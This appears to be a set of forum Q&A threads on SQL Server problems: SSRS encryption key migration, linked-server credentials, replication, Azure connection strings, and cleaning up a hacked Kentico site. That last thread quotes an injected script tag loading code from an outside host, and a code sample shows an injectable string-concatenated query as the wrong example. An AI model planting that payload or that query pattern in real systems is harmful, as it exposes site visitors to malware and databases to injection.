I have been experiencing random connection/handshake problems with a Hyper-V server VM running SQL Server and SSRS.
So the network guys suggested building a new VM and trying it there. (Have you tried rebooting?)
I asked that they rename the old server (--> SQLBKUP) and give the new server the current name (--> SQL) so all my connection strings will continue to work.
Regardless of the wisdom of that approach, that is all now done.
All of our applications work (and the weird handshake issue is gone, joy).
I have reinstalled SSRS and I thought I was home free.
We backed up and restored the ReportServer and ReportServerTemp databases to the new server.
If I try to point SSRS at these databases, I keep getting this error:
The report server installation is not initialized. (rsReportServerNotActivated) Get Online Help
Any and all information I can find about this for SSRS 2012 says that the initialization happens automatically when you configure a database.
I tried creating a new database, and presto, everything works fine.
I reconfigured SSRS to point at the old database and I again get the rsReportServerNotActivated error.
I also powered down SQLBKUP in case it was causing some confusion; I can't imagine what that might be, but why not... This did NOT correct the problem.
Any ideas on why the databases that were working on one server won't work on the new one?
Searching the interweb for this issue I find two results for 2012 SSRS (many hits for 2005 issues/resolutions).
This article details how the RSExec role should be configured; I have verified that it is all correct.
https://msdn.microsoft.com/en-us/library/cc281308.aspx
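For reference, this is roughly how I checked it (a rough sketch; sp_helprolemember is the standard system procedure, run in each of the databases the article lists):
-- Run in ReportServer, ReportServerTempDB, master, and msdb
-- to list the members of the RSExecRole in each database.
EXEC sp_helprolemember 'RSExecRole';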
This article details the mechanics of the various ways to move a report server database. The backup and restore operations went off without a hitch.
https://msdn.microsoft.com/en-us/library/ms156421.aspx
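For what it's worth, the move was just a plain backup/restore along these lines (a rough sketch from memory; paths and the ReportServerTempDB name are whatever your installation uses):
-- On SQLBKUP (the old server)
BACKUP DATABASE ReportServer TO DISK = N'C:\Backups\ReportServer.bak';
BACKUP DATABASE ReportServerTempDB TO DISK = N'C:\Backups\ReportServerTempDB.bak';

-- On SQL (the new server), after copying the .bak files over
-- (add WITH MOVE clauses if the data/log file paths differ on the new box)
RESTORE DATABASE ReportServer FROM DISK = N'C:\Backups\ReportServer.bak' WITH REPLACE;
RESTORE DATABASE ReportServerTempDB FROM DISK = N'C:\Backups\ReportServerTempDB.bak' WITH REPLACE;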
Neither article mentions cleaning up any server names, IP addresses, etc. that might be in a config table. Inspecting the tables in SSMS, I don't see any tables that look like they might need such attention.
I can always recreate the environment, and I am about at that point; at least then I will know what I have in front of me. If anyone has any suggestions, I would appreciate it. I'm sure I will be up for a while... :-)
tyia
greg
You are getting that error because you haven't moved the old encryption keys to the new server. SSRS uses encryption to secure credentials and connection information. You'll need to get the encryption keys from the old server and restore them to the new one, OR, if you don't have the keys anymore, you can create new ones, but then you'll need to set up your connection information again.
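If you want to see this for yourself before touching anything, the restored catalog still carries the key rows that were created on the old machine. A hedged sketch (dbo.Keys is the table in the ReportServer catalog that holds the symmetric key metadata; column names from memory):
-- Run against the restored ReportServer catalog on the new server.
-- Rows with a non-null MachineName show which machine/instance the
-- encryption key was created on; after the restore it will still be the old server.
USE ReportServer;
SELECT MachineName, InstanceName
FROM dbo.Keys
WHERE MachineName IS NOT NULL;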
First back up your old encryption keys:
Start the Reporting Services Configuration Manager, and then connect to the report server instance you want to configure.
Click Encryption Keys, and then click Back Up.
Type a strong password.
Specify a file to contain the stored key. Reporting Services appends a .snk file extension to the file. Consider storing the file on a disk separate from the report server.
Click OK.
Then restore the keys to the new server:
Start the Reporting Services Configuration Manager, and then connect to the report server instance you want to configure.
On the Encryption Keys page, click Restore.
Select the .snk file that contains the backup copy.
Type the password that unlocks the file.
Click OK.
You can also use the rskeymgmt utility; see the MSDN article Back Up and Restore Reporting Services Encryption Keys.
If you don't have access to the older server you'll need to delete and recreate the encryption keys. Once you delete the keys the server will automatically re-initialize itself and you'll need to re-enter all of the lost encrypted information.
The following things will occur when you delete the encryption keys:
Connection strings in shared data sources are deleted. Users who run reports get the error "The ConnectionString property has not been initialized."
Stored credentials are deleted. Reports and shared data sources are reconfigured to use prompted credentials.
Reports that are based on models (and require shared data sources configured with stored or no credentials) will not run.
Subscriptions are deactivated.
Steps to delete the keys:
Start the Reporting Services Configuration tool, and then connect to the report server instance you want to configure.
Click Encryption Keys, and then click Delete. Click OK.
Restart the Report Server Windows service. For a scale-out deployment, do this on all report server instances.
This is from MSDN - Delete and Re-create Encryption Keys. The article has a lot more useful information.
For more information, also read Configure and Manage Encryption Keys.
For many years we've had a reporting database that we have written our SSRS reports out of, which includes some linked servers. The linked servers are set up on the SQL instance where Reporting Services lives, as well as the main databases we use to report out of. We've decided to split Reporting Services off from the main server and give it its own house.
I've set up SQL Server 2014 along with Reporting Services, and published my reports over there instead. All of the 'non-linked' reports work fine. However, all the reports that reference a linked server (that used to work on the main server) now fail with the following error in the log file:
Access to the remote server is denied because the current security context is not trusted.
I thought maybe I needed to set up the linked servers on the new RS SQL server to get this to work. I had assumed that it would pass the entire query (including the linked part) over to the data source specified and my primary server would run it and return the data. Nevertheless, I set up the exact same linked servers on the new reporting services box... but still receive the same error.
All these reports worked just fine on the original server, however they all seem to be having issues on the new server no matter what linked server they are connecting to.
I am at a loss, and would love any ideas you guys may have.
Server A:
Main data source. This server contains the majority of our data and also housed our Reporting Services. This server has links to several other SQL Servers that I was able to OPENQUERY against and join the data to our main data source. We have many published reports that utilize the linked servers and they have historically caused no issues.
Server B:
New SSRS box. This new server was set up in an attempt to off-load all of our reporting needs to another box, thereby freeing up the resources required to run reports and SSIS packages. I took all of our existing reports and published them to the new server as-is. Initially I didn't think I would need to recreate the linked servers on this box, since those requests would be going to my main data source (Server A). I've tried both with and without the linked servers existing on Server B, but get the same results. When the linked servers DID exist on Server B, I was able to query them directly with no errors. The services on Server B are running under the same credentials as those on Server A.
Well, I did some more digging and found my resolution. The data sources have always been using the end users' credentials to run the reports. On the old server, the linked servers use a hard-coded SQL account to make the connection. This works fine so long as it is all on one server; however, when running from a secondary server it appears that this scenario will not work. Instead, I found that if I make the data source use the same hard-coded SQL account as the linked server to make the connection to Server A, the linked servers work fine.
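For anyone hitting the same wall, this is roughly what the working setup looks like on Server B (a hedged sketch; the server, login, and password names are placeholders for whatever your environment uses):
-- On Server B: define the linked server back to Server A
EXEC master.dbo.sp_addlinkedserver
    @server = N'ServerA',
    @srvproduct = N'SQL Server';

-- Map every local login to the same fixed SQL login the report
-- data source uses, so the security context sent to Server A is
-- always one it trusts.
EXEC master.dbo.sp_addlinkedsrvlogin
    @rmtsrvname = N'ServerA',
    @useself = N'False',
    @locallogin = NULL,
    @rmtuser = N'reporting_login',
    @rmtpassword = N'StrongPasswordHere';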
I am trying to find the best procedure to get data from our SQL Server at headquarters to update apps running on local machines in various locations not connected to our network. Our current data and application are in FoxPro, where you simply copy the data file, so I am not very familiar with using SQL databases.
The field app uses LocalDB and users don't save anything to the database. When the app opens it checks a web site for updates. I tried detaching our HQ .mdf and .ldf, downloading them and overwriting them on the local machine, but LocalDB would not attach to the new file (same name). I thought LocalDB closes and detaches when the application closes, but maybe I am wrong. I also wonder if I need the log file, since no changes are made and I don't need to roll back anything. I have searched for a good article on this topic but haven't found anything. This must be a fairly common scenario in many companies.
You want to look into using replication, probably snapshot replication. This allows you to send one or more tables, or other objects, to off-site SQL Server instances on whatever schedule is applicable. You can use HTTP to send the data.
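As a rough idea of what the publication side involves (a hedged sketch only; it assumes a distributor is already configured, the database, publication, and table names are placeholders, and the subscriptions for the field machines are set up separately):
USE HQData;  -- placeholder name for the HQ database being published

-- Enable the database for publishing.
EXEC sp_replicationdboption @dbname = N'HQData', @optname = N'publish', @value = N'true';

-- Create a snapshot publication and its Snapshot Agent.
EXEC sp_addpublication @publication = N'FieldAppSnapshot', @repl_freq = N'snapshot', @status = N'active';
EXEC sp_addpublication_snapshot @publication = N'FieldAppSnapshot';

-- Add one table (article) to the publication; repeat per table.
EXEC sp_addarticle @publication = N'FieldAppSnapshot', @article = N'Customers', @source_object = N'Customers';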
Not sure where to start, but whenever I publish my ASP.NET website to Azure, any pages which have database access give me a message saying "Error. An error occurred while processing your request." I open up the remote debugger (which is fickle because it refuses to attach half of the time) and I see that the error occurs when trying to establish a connection through Entity Framework. The error varies between a "network-related or instance-specific" error and a "Login failed" error (which could be the result of the previous error, I really don't know).
The ADO.NET connection string SQL Azure gives is
Server=tcp:[servername].database.windows.net,1433;Database=EnsembleMusicWebDatabase;User ID=user@[servername];Password=(password);Trusted_Connection=False;Connection Timeout=30;
But every implementation (inserting that into the EF metadata string, changing Server to Data Source, etc.) still gives me the same login error.
I'm pretty sure it's a problem with the connection string, but the infuriating part is that I've tried every possible combination I can think of (Entity Framework metadata, using the SQL Azure database ADO.NET connection strings in every possible way, changing the Azure website connection strings under the Config tab, using just a plain connection string, etc.).
I've deleted and rebuilt the Entity Framework models at least 5 times, and every time I can successfully establish a connection to the server and it successfully reads my database and creates the correct models. I deploy the application to localhost and it works. The problem is when I publish, it cannot access the database and keeps giving me these login failed errors (the login details are the exact same as when I set up the EF model).
I think it might be something to do with the firewall, since I can access the DB locally with an approved firewall IP in the server config, but the website itself can't access the database (I have the allow Azure services box ticked as well). I'm really at a loss for what to do now, because I just want the site (not any user, just the application) to fetch some data from the database and display it on the page, but I don't understand how this could be so complicated.
Can anyone point me in the right direction? I tried every tutorial and example on msdn and I can't find any solutions on SO that work.
Thanks,
Shaun
I realised that I somehow got into a complete mess with connection strings all over the place and the best way to fix it was just to start again. I deleted my Azure website and database instances, built the database first (created a correct login as well) and then when creating a new website Azure gave me the option to include the database I had just created. I now have a correct connection string that Azure generated, but to be safe (because the metadata made connection strings confusing and I didn't want to risk having this same issue again) I'm not using Entity Framework and just using normal SqlClient queries, since the website only requests two objects from a database.
I think now I've got a correct and working string I can look at it and really understand where I went wrong and how to avoid this if I do end up using Entity Framework.
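One thing that helped was creating a dedicated login and user for the site rather than reusing the server admin account. Roughly this (a sketch with placeholder names; run the first statement against the logical server's master database and the rest against the application database):
-- Against master:
CREATE LOGIN WebAppLogin WITH PASSWORD = 'Str0ng!Passw0rd';

-- Against the application database (EnsembleMusicWebDatabase):
CREATE USER WebAppUser FOR LOGIN WebAppLogin;
ALTER ROLE db_datareader ADD MEMBER WebAppUser;
The connection string then uses that login (User ID=WebAppLogin@[servername]) instead of the admin account.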
I installed SQL Server 2005 Express on a clean virtual Windows XP machine.
On the Database Engine I created two instances; on each of them I configured mixed authentication, and the 'sa' password on the first is 'password1' and on the second 'password2'.
Then, in the first instance, I created a new database with an ordinary table and a few rows of data. After that I stopped the first instance and tried to attach the database in the second instance. As was to be expected, this caused an error and the process was aborted.
Then what I did was change the 'sa' password in the second instance to the one used in the first instance ('password1'). Trying the attach again, the process ran correctly and the database created in the first instance was properly attached to the second instance.
Up to here, nothing weird; my surprise came with the next step.
In the second instance, I changed the 'sa' password again, this time back to what it was originally ('password2'), and the attached database kept working.
That is the first thing I don't understand: why does it work this way? As a last test, I stopped the second instance and started the first, and to my surprise that database also kept working.
Can someone tell me why it behaves like this?
My fear is this: I create a database while the 'sa' password is 'X', someone discovers that password, and I then change it; if that someone attaches the database in another instance, can they use the old password to open it? Does the same behavior happen in other editions of SQL Server?
Is there any extra security layer you would recommend I apply?
The sa password should have no effect on any user-created databases. It would only affect the system databases (master, model, msdb, tempdb), unless, of course, you encrypted your database files or you are doing a password-protected backup/restore (which you are not).
When you were unable to attach the first time, I would suspect that the first SQL instance had not finished shutting down yet. It was merely a coincidence that you took a few minutes to change passwords and then were able to attach the original DB file.
If you want to secure your databases so they are not stolen and attached to another instance, I would recommend doing this at the server OS level: prevent people from getting to the files in the first place.
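To put it another way, attaching is just a file-level operation plus server permissions; the sa password never enters into it. A hedged sketch (file paths are placeholders):
-- Any sysadmin on the second instance can attach the copied files,
-- regardless of what either instance's sa password is or was.
CREATE DATABASE TestDb
ON (FILENAME = N'C:\Data\TestDb.mdf'),
   (FILENAME = N'C:\Data\TestDb_log.ldf')
FOR ATTACH;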
My site is built with Kentico CMS 5.5 and SQL Server 2008. It was running successfully, but recently a hacker compromised my site, and after a long time I found that in many of the tables the hacker added the line
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
before every varchar value. Suppose I have a user table: before the username it adds this string, and before the user's email ID it adds the same string. How can I protect my SQL Server from this kind of hacking? And what is the reason behind this?
How can I protect my SQL Server from this kind of hacking?
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be a SQL injection attack, probably aimed at sending your visitors to a malware or fraudulent site.
Unfortunately, as Kentico CMS is commercial software, your options are limited. You won't have the source code that you can tweak to prevent further attacks coming through the front end.
You may need to:
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is successful, you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted into the database.
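As a rough idea of that last resort (a hedged sketch only; the table, key, and column names are placeholders for your actual schema, and you would need one of these per affected table/column):
-- Strips the injected script tag from newly inserted or updated rows.
CREATE TRIGGER trg_StripInjectedScript
ON dbo.Users
AFTER INSERT, UPDATE
AS
BEGIN
    SET NOCOUNT ON;
    UPDATE u
    SET u.UserName = REPLACE(u.UserName,
        '></title><script src="http://lilupophilupop.com/sl.php"></script><!--', '')
    FROM dbo.Users AS u
    INNER JOIN inserted AS i ON i.UserID = u.UserID;
END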
You need to follow industry best practices: look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
for the top 10 web application security risks.
There are a few things to keep in mind to protect your database from hacking, given below:
Always use parameterized SQL; pass all values to the DB using parameterized queries:
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = @ID");
cmd.Parameters.AddWithValue("@ID", value);
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Do the same for INSERT, UPDATE, and DELETE queries, or use stored procedures in the same manner (see the sketch after this list).
Grant permissions only to your specific application user.
You can turn ValidateRequest on or off in your page/web.config file as required.
Validate on both the client and server side so that only valid data reaches the DB.
Use the appropriate data type for each column rather than a catch-all type (say, VARCHAR for everything).
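For the stored procedure point above, a small sketch (the table and column names are just examples):
-- The parameter keeps the value out of the SQL text entirely.
CREATE PROCEDURE dbo.GetRecordById
    @ID int
AS
BEGIN
    SET NOCOUNT ON;
    SELECT * FROM dbo.TableName WHERE ID = @ID;
END
Call it from a SqlCommand with CommandType set to StoredProcedure and add @ID as a parameter, just like the query above.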
Thanks
I agree with @Heinzi: you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via SQL Server, through the web server, or through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go; you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sorts of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the Windows log of the machine your SQL Server is installed on: look for logins happening at questionable times, look for odd user accounts, and examine your password and username security. Get more details of things to look into here: Windows Intruder Detection Checklist.
If that doesn't turn up anything, look at the SQL Server logs, and review your username/password security AND the access to the SQL Server instance; e.g. the SQL Server should only be accessible from machines that have an explicit reason to reach it (your web server, maybe a network admin box, etc.). Use Windows Firewall to make the access tight, so that the SQL Server instance doesn't just respond to any computer asking. Here are more details about how to secure SQL Server.
Check the web.config on your web server: is the SQL Server username and password there? Check your FTP logs to see if anyone has tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log, go back to the date when you first noticed the problem, and examine the entries to see which user account was making the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog]
Again, look for entries that seem to happen at odd times or come from weird IP addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this: tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the awesome Nmap security scanner.
As an example, my web servers only publicly expose ports 80 and 443 (HTTP and HTTPS), and maybe a random high port like 4456 for FTP if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The SQL servers have NO public ports; they are tuned to 'stealth' and do not reply to any request from a non-authorized IP.
As an anecdotal example: when I put a server live, it has taken as little as 8 hours before bots start trying to log in via Remote Desktop (you can see thousands of failed attempts in the Windows Event Log > Security); as soon as you use Windows Firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems; you may have just found the tip of the iceberg. There could be Trojans, rootkits, and other nasties waiting, so you'll need a full security scan too.